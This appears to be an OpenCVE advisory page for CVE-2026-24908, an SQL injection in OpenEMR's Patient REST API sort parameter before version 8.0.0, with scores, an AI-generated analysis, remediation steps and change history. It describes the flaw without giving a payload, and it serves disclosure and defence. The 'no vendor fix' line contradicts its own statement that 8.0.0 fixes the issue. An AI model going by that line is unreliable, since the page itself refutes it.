Description
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the `_sort` parameter. This could potentially lead to database access, PHI (Protected Health Information) exposure, and credential compromise. The issue occurs when user-supplied sort field names are used in ORDER BY clauses without proper validation or identifier escaping. Version 8.0.0 fixes the issue.
Published: 2026-02-25
Score: 10 Critical
EPSS: < 1% Very Low
KEV: No
Impact: SQL Injection that can expose PHI and compromise credentials
Action: Apply patch
AI Analysis

Impact

The flaw lies in the Patient REST API where the _sort parameter is concatenated directly into an ORDER BY clause without validation, enabling an authenticated API user to inject arbitrary SQL. This injection can lead to unrestricted database access, the disclosure of protected health information, and possible compromise of user credentials.

Affected Systems

OpenEMR systems running any version earlier than 8.0.0 are affected. Version 8.0.0 and later contain the fix that properly escapes or validates the sort field names.

Risk and Exploitability

The vulnerability carries a CVSS score of 10, classifying it as critical. Its EPSS score falls below 1%, indicating a low exploitation probability, and it is not listed in the CISA KEV catalogue. The likely attack vector requires authentication to the OpenEMR API, so the threat vector is inferred to be a legitimate user or insider acting maliciously, though external exploitation could occur if API credentials are compromised. The exploitation path is straightforward: the attacker supplies a crafted _sort value that injects arbitrary SQL commands, bypassing normal access controls and enabling data extraction or manipulation.

Generated by OpenCVE AI on April 17, 2026 at 15:02 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to OpenEMR version 8.0.0 or later to apply the vendor patch
  • Restrict API access to authenticated users only and enforce least‑privilege roles
  • Add server‑side validation to the _sort parameter, accepting only a whitelist of allowed field names

Generated by OpenCVE AI on April 17, 2026 at 15:02 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 27 Feb 2026 14:45:00 +0000

Type Values Removed Values Added
First Time appeared Open-emr
Open-emr openemr
CPEs cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
Vendors & Products Open-emr
Open-emr openemr

Thu, 26 Feb 2026 13:30:00 +0000

Type Values Removed Values Added
First Time appeared Openemr
Openemr openemr
Vendors & Products Openemr
Openemr openemr

Wed, 25 Feb 2026 19:00:00 +0000

Type Values Removed Values Added
Description OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the `_sort` parameter. This could potentially lead to database access, PHI (Protected Health Information) exposure, and credential compromise. The issue occurs when user-supplied sort field names are used in ORDER BY clauses without proper validation or identifier escaping. Version 8.0.0 fixes the issue.
Title OpenEMR has SQL Injection in Patient API Sort Parameter
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 10, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}

Subscriptions

Open-emr Openemr
Openemr Openemr
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T16:14:34.090Z

Reserved: 2026-01-27T19:35:20.530Z

Link: CVE-2026-24908

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Analyzed

Published: 2026-02-25T19:43:21.657

Modified: 2026-02-27T14:42:29.287

Link: CVE-2026-24908

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-17T15:15:21Z

Weaknesses